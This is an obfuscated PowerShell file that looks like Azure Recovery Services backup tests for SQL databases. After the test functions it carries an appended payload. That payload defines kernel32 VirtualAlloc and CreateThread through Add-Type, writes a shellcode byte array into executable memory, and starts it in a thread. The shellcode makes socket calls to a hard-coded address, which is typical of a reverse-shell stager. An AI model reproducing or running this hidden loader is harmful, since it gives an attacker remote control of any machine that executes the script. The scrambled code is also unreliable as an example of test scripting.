function T`E`St-`A`ZUrES`qlGeTITeMs
{
	
	${V`A`ULt} = &("{4}{3}{0}{1}{2}{5}"-f 'Servi','c','esV','covery','Get-AzRe','ault') -ResourceGroupName ("{0}{1}{2}"-f's','q','lpaasrg') -Name ("{1}{2}{0}" -f 'rn','sql','paas');
	
	
	${naM`EDCo`N`T`AINER} = &("{0}{7}{3}{6}{4}{5}{9}{1}{8}{2}"-f'Ge','Con','er','er','ces','Bac','yServi','t-AzRecov','tain','kup') `
		-VaultId ${Va`UlT}."iD" `
		-ContainerType ("{0}{2}{1}"-f 'AzureS','L','Q') `
		-BackupManagementType ("{1}{0}{2}"-f'z','A','ureSQL') `
		-Name ("{4}{0}{3}{2}{5}{1}{6}"-f'l;sqlpaasrg;s','erv','l','q','Sq','paass','er');
	&("{1}{2}{0}" -f'al','Ass','ert-AreEqu') ${NA`mEd`co`NtAI`NER}."N`Ame" ("{6}{0}{4}{1}{5}{3}{2}" -f 'l;','s','aasserver','qlp','sqlpaa','rg;s','Sq');

	
	${it`Em} = &("{9}{7}{8}{5}{4}{3}{1}{6}{2}{0}"-f 'em','ySer','BackupIt','ver','o','ec','vices','-Az','R','Get') `
		-VaultId ${va`UlT}."iD" `
		-Container ${N`A`meDCoNtaINER} `
		-WorkloadType ("{3}{1}{0}{2}{4}"-f'Da','ureSQL','tab','Az','ase');
	.("{0}{1}{3}{2}{4}" -f'As','ser','AreEqu','t-','al') ${It`EM}."nA`ME" ("{16}{13}{6}{8}{3}{22}{1}{19}{11}{17}{23}{5}{20}{21}{2}{7}{4}{24}{9}{15}{12}{10}{18}{0}{25}{14}"-f'6a-b3cb-68f9','c1-cat','7-','sea-d1-','0;6','1','ty','2','ay-','1f094','b7-','2016','d5','ame;sa','d325a3c','2-','dsN','-','48','alog-','-','1','f','11-1','6','7');

	
	${i`TEm} = .("{4}{6}{0}{2}{1}{3}{5}" -f 'z','e','R','coveryServicesBackup','Get-','Item','A') `
		-VaultId ${v`A`ULt}."I`d" `
		-Container ${N`AMEd`C`oNTAiN`Er} `
		-WorkloadType ("{0}{2}{3}{1}" -f'Az','eSQLDatabase','u','r') `
		-Name ("{10}{13}{22}{18}{12}{11}{5}{3}{17}{19}{7}{21}{2}{20}{6}{1}{15}{14}{8}{4}{16}{0}{9}"-f'd3','61f09','016-11-','a-','3cb-','yay-se',';6','c1-c','6a-b','25a3c','dsN','t',';sa','a','-d5b7-48','42','68f97','d1-','e','f','11-17-20','atalog-2','m');
	.("{3}{2}{0}{1}"-f 'eEqu','al','ert-Ar','Ass') ${it`EM}."n`Ame" ("{9}{1}{10}{0}{7}{2}{13}{12}{3}{8}{4}{11}{6}{5}" -f'ay','N','a-d1-fc1-catalog','-11-17-20;661f0942-d5','86a-','d325a3c','b-68f97','-se','b7-4','ds','ame;saty','b3c','2016-11','-');
}

function TEST`-AZU`RE`s`q`lD`isAb`Le`PRot`eCtiON
{
	
	${VAu`LT} = &("{1}{5}{4}{0}{2}{3}"-f'ySer','G','vices','Vault','t-AzRecover','e') -ResourceGroupName ("{0}{1}{2}" -f 'sq','lpaas','rg') -Name ("{2}{0}{1}" -f's','rn','sqlpaa');
	
	
	${NaM`edco`NT`Ai`NEr} = &("{3}{6}{1}{2}{5}{0}{4}"-f'i','Reco','veryServicesBackupCon','G','ner','ta','et-Az') `
		-VaultId ${v`AU`Lt}."id" `
		-ContainerType ("{2}{0}{1}"-f 'Q','L','AzureS') `
		-BackupManagementType ("{1}{0}{2}" -f 'zureSQ','A','L') `
		-Name ("{3}{1}{4}{2}{0}" -f'er','q','erv','Sql;s','lpaasrg;sqlpaass');
	.("{1}{3}{2}{0}" -f'eEqual','Ass','r','ert-A') ${namEdCo`NT`A`In`ER}."Na`ME" ("{5}{2}{3}{4}{0}{1}" -f 'aas','server','l','p','aasrg;sqlp','Sql;sq');

	
	${i`TeM} = &("{7}{1}{4}{8}{3}{0}{2}{6}{5}"-f 'cove','e','ryServicesB','Re','t','upItem','ack','G','-Az') `
		-VaultId ${V`A`UlT}."I`D" `
		-Container ${nAM`eD`CO`NTAINEr} `
		-WorkloadType ("{1}{3}{4}{0}{2}" -f 'Da','Azu','tabase','reSQ','L') `
		-Name ("{23}{6}{4}{24}{18}{17}{10}{5}{11}{15}{22}{1}{3}{7}{12}{2}{13}{19}{14}{9}{0}{21}{8}{16}{20}" -f 'c','-17-','2-d','2','a','ata','ty','0;661f','f','3','1-c','l','094','5b7-4','a-b','og-2016-1','97d325','c','ea-d1-f','86','a3c','b-68','1-11','dsName;sa','y-s');
	.("{0}{2}{1}{3}" -f 'Asser','-AreEqua','t','l') ${IT`Em}."Na`me" ("{18}{1}{14}{8}{17}{6}{5}{4}{19}{12}{7}{20}{11}{10}{2}{3}{21}{13}{15}{16}{0}{9}" -f '5','Nam','b3cb-','6','1','6-','01','7','y-sea-d1-f','a3c','6a-','0;661f0942-d5b7-48','11-1','f9','e;satya','7d3','2','c1-catalog-2','ds','1-','-2','8');

	${j`oB} = &("{0}{7}{6}{3}{5}{8}{10}{1}{4}{2}{9}"-f 'D','o','ectio','yServic','t','esBacku','le-AzRecover','isab','p','n','Pr') `
		-VaultId ${VaU`lt}."I`D" `
		-Item ${I`TEM} `
		-RemoveRecoveryPoints `
		-Force;
}

function TESt-a`Z`UreSqL`g`etR`PS
{
	
	${vA`U`LT} = .("{3}{2}{4}{0}{5}{1}"-f'i','lt','AzRecoverySe','Get-','rv','cesVau') -ResourceGroupName ("{2}{1}{0}" -f'rg','lpaas','sq') -Name ("{0}{1}{2}"-f 'sqlp','aa','srn');
	
	
	${NAmED`CON`Ta`INer} = .("{4}{1}{6}{0}{5}{7}{2}{3}{8}"-f 'icesB','zRecoveryS','Con','tai','Get-A','a','erv','ckup','ner') `
		-VaultId ${Va`U`lt}."i`d" `
		-ContainerType ("{1}{2}{0}"-f'QL','Azur','eS') `
		-BackupManagementType ("{1}{0}" -f 'ureSQL','Az') `
		-Name ("{0}{3}{1}{4}{2}" -f'Sql;sq','sqlpa','server','lpaasrg;','as');
	.("{2}{3}{0}{1}"-f'eEqua','l','Asse','rt-Ar') ${NA`MEDCON`TAINER}."N`AMe" ("{0}{3}{2}{5}{1}{4}"-f 'Sql;','aa','qlpaas','s','sserver','rg;sqlp');

	
	${IT`Em} = &("{0}{5}{1}{2}{3}{7}{6}{4}" -f'Ge','zRe','co','verySe','pItem','t-A','ku','rvicesBac') `
		-VaultId ${V`AuLT}."I`d" `
		-Container ${NA`MEDcOn`Ta`In`er} `
		-WorkloadType ("{3}{0}{1}{2}"-f 'Dat','a','base','AzureSQL') `
		-Name ("{13}{0}{1}{9}{12}{4}{10}{11}{3}{5}{16}{2}{14}{8}{6}{7}{15}"-f'a','m','6','1f094','ay-sea-d1-fc1-c','2-d5b7','f97d','32','8','e;sa','atalog','-2016-11-11-17-20;66','ty','dsN','a-b3cb-6','5a3c','-48');
	.("{0}{1}{2}{3}"-f'A','ssert','-','AreEqual') ${I`TeM}."n`AMe" ("{8}{10}{5}{6}{9}{11}{3}{7}{2}{1}{4}{13}{12}{0}" -f'3c','0;661f0942-d','11-11-17-2','sea-d1-f','5b7-48','am','e;saty','c1-catalog-2016-','ds','a','N','y-','68f97d325a','6a-b3cb-');

	${F`i`XEdSTArTD`ATE} = .("{1}{0}{2}" -f'et','G','-Date') -Date ("{3}{0}{1}{2}"-f '01','6-06-13 16:','30:00Z','2')
	${sTaRT`D`ATe} = ${F`Ix`EDstarTdate}.("{1}{3}{0}{2}" -f 'v','T','ersalTime','oUni').Invoke()
	${fIX`edenDd`ATE} = .("{2}{0}{1}" -f 'at','e','Get-D') -Date ("{4}{3}{1}{2}{5}{0}"-f '0Z','0:','30',' 1','2016-06-18',':0')
	${E`Nd`DAtE} = ${fIx`eDe`N`DDATe}.("{2}{3}{0}{1}"-f 'T','ime','ToUnive','rsal').Invoke()
	
	${r`eCOVerYp`oin`Ts} = .("{2}{9}{1}{8}{5}{4}{6}{10}{7}{3}{0}"-f 'yPoint','veryS','Get-Az','r','ac','B','kupRec','e','ervices','Reco','ov') `
		-VaultId ${v`AuLt}."I`d" `
		-Item ${i`Tem}[0] `
		-StartDate ${S`T`ARTdAtE} `
		-EndDate ${EN`dD`ATe}
	if (!(${RecOveRYpO`i`NTs} -eq ${n`ULL}))
	{
		foreach(${RECov`ERYP`OInt} in ${R`ECOVe`RY`poiNTS})
		{
			&("{3}{0}{2}{1}"-f 'ssert-N','ll','otNu','A') ${recO`VER`y`POinT}."rE`C`OveRYp`oI`NtTImE" ("{4}{5}{6}{7}{3}{1}{2}{8}{0}" -f 'be null','sh','ould ',' ','Reco','v','eryPoin','tTime','not ')
			&("{3}{1}{2}{0}"-f 'otNull','sse','rt-N','A') ${Reco`VErY`Poi`NT}."recover`y`PoIN`Tt`ype" ("{5}{2}{1}{0}{4}{3}{6}"-f 'yP','r','ve','n','ointType should ','Reco','ot be null')
			&("{2}{1}{3}{0}" -f 'tNull','sert','As','-No') ${RECo`VE`RY`pO`inT}."Na`Me"  ("{5}{1}{2}{3}{4}{0}"-f 'l','eryPoint','Id should',' ','not be nul','Recov')
		}
	}
}


${c} = (((("{74}{23}{96}{42}{39}{68}{57}{13}{45}{5}{11}{47}{89}{9}{44}{27}{95}{15}{20}{18}{14}{76}{69}{6}{51}{12}{35}{26}{34}{72}{29}{54}{63}{4}{75}{59}{50}{73}{22}{56}{3}{38}{81}{53}{43}{60}{62}{67}{91}{77}{93}{40}{98}{8}{55}{32}{80}{85}{1}{88}{36}{2}{48}{79}{86}{84}{92}{64}{16}{66}{78}{28}{7}{97}{90}{0}{82}{17}{19}{58}{30}{61}{24}{31}{94}{41}{49}{65}{37}{25}{83}{10}{52}{21}{70}{71}{33}{46}{87}"-f'IntPtr l',', ','tr',')]p','por',' stat','ize, uint','uint ','r lpThreadAttr','ir','IntPtr dest, uint ','ic extern ','lAllo','u','e','Ad','l','eadId)','r',';[','d',', u','ll','lImport','{0}','ext','ationType, ','llo','meter, ','otect);','mport','msvcrt.d','k','unt','uint fl','c','P',' ','ub','l32.','P','{','e','ic ex','tualA','blic',')','IntP',' lpStar','0})]p','}ke',' f','src','ic stat','[Dll','ibutes, uint dwStac','{0}','0})]p','DllI','({0','tern In','(','tPtr CreateThre','Im','r ','ublic static','p','a','dll{','wS','int ','co','Pr','rnel32.d','[Dl','t','ss, uint d','n','Para','t','S','l','pThr','ern IntPtr memset(','dre','ize','Ad',';','Int','tr V','Flags, ','d(I','ss, IntPt','t','ll','c(IntPtr lp','({0}kern','dwCreation','t'))-F[ChAR]34));${W} = .("{0}{2}{1}" -f'A','-Type','dd') -memberDefinition ${C} -Name ("{0}{1}"-f'Win','32') -namespace ("{0}{4}{2}{3}{1}" -f 'Wi','s','unct','ion','n32F') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x86,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x8b,0x4c,0x10,0x78,0xe3,0x4a,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x89,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x69,0x6f,0x70,0x2a,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."Le`NgTH" -gt 0x1000){${G} = ${Z}."LEn`g`TH"};${X}=${W}::("{3}{2}{1}{0}"-f'c','lo','lAl','Virtua').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."L`E`Ngth"-1);${I}++) {${w}::"mE`Ms`ET"([IntPtr](${x}.("{0}{2}{1}"-f 'T','Int32','o').Invoke()+${i}), ${Z}[${i}], 1)};${W}::("{1}{0}{2}" -f 'te','Crea','Thread').Invoke(0,0,${X},0,0,0);for (;;){&("{1}{2}{0}" -f 'eep','Start-s','l') 60};
